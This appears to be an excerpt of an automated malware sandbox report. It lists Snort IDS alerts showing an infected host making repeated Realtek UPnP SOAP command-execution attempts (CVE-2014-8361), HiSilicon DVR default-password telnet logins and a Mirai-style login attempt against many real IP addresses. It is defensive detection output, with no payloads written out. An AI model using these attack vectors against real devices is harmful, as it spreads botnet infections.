                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37006 -> 45.126.229.221:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43596 -> 91.208.8.136:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43596 -> 91.208.8.136:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54544 -> 185.133.76.182:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54544 -> 185.133.76.182:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43604 -> 91.208.8.136:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47916 -> 91.77.101.9:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47916 -> 91.77.101.9:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47968 -> 91.77.101.9:52869
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 200.178.94.209:23 -> 192.168.2.23:52064
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 37.84.226.148:23 -> 192.168.2.23:56936
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 37.84.226.148:23 -> 192.168.2.23:56936
                Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:53512 -> 95.209.147.208:23
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 204.117.53.70:23 -> 192.168.2.23:58248
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 204.117.53.70:23 -> 192.168.2.23:58248
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45518 -> 45.121.59.64:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45518 -> 45.121.59.64:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54614 -> 185.71.65.128:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54614 -> 185.71.65.128:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58728 -> 91.97.99.68:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58728 -> 91.97.99.68:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54626 -> 185.71.65.128:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58742 -> 91.97.99.68:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34122 -> 45.42.94.5:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34122 -> 45.42.94.5:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47982 -> 45.138.68.42:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47982 -> 45.138.68.42:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41844 -> 45.115.243.95:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41844 -> 45.115.243.95:52869
                Source: TrafficSnort IDS: 716 INFO TELNET access 87.205.45.186:23 -> 192.168.2.23:45104
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40940 -> 91.78.1.147:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40940 -> 91.78.1.147:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40944 -> 91.78.1.147:52869
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 201.235.160.26:23 -> 192.168.2.23:48514
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40816 -> 45.133.119.178:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40816 -> 45.133.119.178:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 209.112.40.201:23 -> 192.168.2.23:52494
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 209.112.40.201:23 -> 192.168.2.23:52494
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40610 -> 45.45.156.169:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40610 -> 45.45.156.169:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59958 -> 45.33.251.73:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59958 -> 45.33.251.73:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40656 -> 45.45.156.169:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 204.117.53.70:23 -> 192.168.2.23:58350
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 204.117.53.70:23 -> 192.168.2.23:58350
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36280 -> 45.41.82.88:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36280 -> 45.41.82.88:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 111.118.118.151:23 -> 192.168.2.23:60176
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 111.118.118.151:23 -> 192.168.2.23:60176
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 221.152.109.234:23 -> 192.168.2.23:41226
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 201.235.160.26:23 -> 192.168.2.23:48668
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 200.178.94.209:23 -> 192.168.2.23:52296
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 204.117.53.70:23 -> 192.168.2.23:58422
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 204.117.53.70:23 -> 192.168.2.23:58422
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39038 -> 45.33.252.177:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39038 -> 45.33.252.177:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42712 -> 45.41.82.163:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42712 -> 45.41.82.163:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49782 -> 185.225.195.255:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49782 -> 185.225.195.255:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49786 -> 185.225.195.255:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 204.117.53.70:23 -> 192.168.2.23:58468
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 204.117.53.70:23 -> 192.168.2.23:58468
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49888 -> 91.77.222.214:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49888 -> 91.77.222.214:52869
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 201.235.160.26:23 -> 192.168.2.23:48742
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49892 -> 91.77.222.214:52869
                Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:41968 -> 187.190.67.67:23
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46548 -> 185.71.65.237:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46548 -> 185.71.65.237:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46594 -> 185.71.65.237:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60342 -> 45.123.197.4:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60342 -> 45.123.197.4:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39714 -> 45.133.119.231:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39714 -> 45.133.119.231:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60146 -> 185.8.185.237:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60146 -> 185.8.185.237:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60178 -> 185.8.185.237:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53776 -> 185.216.248.224:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53776 -> 185.216.248.224:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53798 -> 185.216.248.224:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55530 -> 45.41.90.228:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55530 -> 45.41.90.228:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 37.84.226.148:23 -> 192.168.2.23:57324
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 37.84.226.148:23 -> 192.168.2.23:57324
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35644 -> 45.115.241.73:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53684 -> 45.195.69.161:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53684 -> 45.195.69.161:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57332 -> 185.71.67.97:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57332 -> 185.71.67.97:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57342 -> 185.71.67.97:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44094 -> 45.125.109.9:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44094 -> 45.125.109.9:52869
                Source: TrafficSnort IDS: 716 INFO TELNET access 111.118.118.151:23 -> 192.168.2.23:60546
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55554 -> 91.232.198.122:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55554 -> 91.232.198.122:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55600 -> 91.232.198.122:52869
                Source: TrafficSnort IDS: 716 INFO TELNET access 70.25.115.152:23 -> 192.168.2.23:47422
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 209.204.44.162:23 -> 192.168.2.23:39108
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 209.204.44.162:23 -> 192.168.2.23:39108
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 200.178.94.209:23 -> 192.168.2.23:52500
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46808 -> 45.82.218.125:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46808 -> 45.82.218.125:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 209.204.44.162:23 -> 192.168.2.23:39118
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 209.204.44.162:23 -> 192.168.2.23:39118
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46824 -> 45.82.218.125:52869
                Source: TrafficSnort IDS: 716 INFO TELNET access 112.216.70.102:23 -> 192.168.2.23:59392
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48590 -> 45.33.250.222:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48590 -> 45.33.250.222:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35436 -> 91.77.152.65:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35436 -> 91.77.152.65:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44802 -> 185.245.181.214:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44802 -> 185.245.181.214:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40654 -> 45.207.220.251:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40654 -> 45.207.220.251:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59920 -> 45.207.220.56:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59920 -> 45.207.220.56:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58580 -> 45.43.233.214:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58580 -> 45.43.233.214:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49202 -> 45.33.248.231:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49202 -> 45.33.248.231:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44834 -> 185.245.181.214:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45890 -> 45.115.238.243:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45890 -> 45.115.238.243:52869
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 171.5.80.29:23 -> 192.168.2.23:56970
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59940 -> 45.207.220.56:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36234 -> 91.200.123.139:52869
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 70.25.115.152:23 -> 192.168.2.23:47422
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35466 -> 91.77.152.65:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44826 -> 185.245.181.214:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44826 -> 185.245.181.214:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44860 -> 185.245.181.214:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44860 -> 185.245.181.214:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44862 -> 185.245.181.214:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44868 -> 185.245.181.214:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40194 -> 45.33.253.68:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40194 -> 45.33.253.68:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 111.118.118.151:23 -> 192.168.2.23:60546
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 111.118.118.151:23 -> 192.168.2.23:60546
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35318 -> 45.84.90.85:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35318 -> 45.84.90.85:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59236 -> 185.207.92.133:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59236 -> 185.207.92.133:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59244 -> 185.207.92.133:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39962 -> 45.42.86.163:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39962 -> 45.42.86.163:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35326 -> 45.84.90.85:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37346 -> 45.60.186.230:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37346 -> 45.60.186.230:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39294 -> 45.41.93.228:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39294 -> 45.41.93.228:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 200.148.142.113:23 -> 192.168.2.23:60768
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 200.148.142.113:23 -> 192.168.2.23:60768
                Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:60768 -> 200.148.142.113:23
                Source: TrafficSnort IDS: 716 INFO TELNET access 70.25.115.152:23 -> 192.168.2.23:47606
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51136 -> 91.78.136.72:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51136 -> 91.78.136.72:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51160 -> 91.78.136.72:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57476 -> 45.41.80.232:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57476 -> 45.41.80.232:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48328 -> 185.241.253.253:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48328 -> 185.241.253.253:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38296 -> 91.77.149.226:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38296 -> 91.77.149.226:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58352 -> 185.71.64.2:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58352 -> 185.71.64.2:52869
                Source: TrafficSnort IDS: 2023452 ET TROJAN Possible Linux.Mirai Login Attempt (Zte521) 192.168.2.23:47614 -> 87.252.56.159:23
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48336 -> 185.241.253.253:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58360 -> 185.71.64.2:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38328 -> 91.77.149.226:52869
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 200.178.94.209:23 -> 192.168.2.23:52682
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37358 -> 45.60.186.230:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44008 -> 45.43.230.141:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44008 -> 45.43.230.141:52869
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 33418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42126 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42128 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
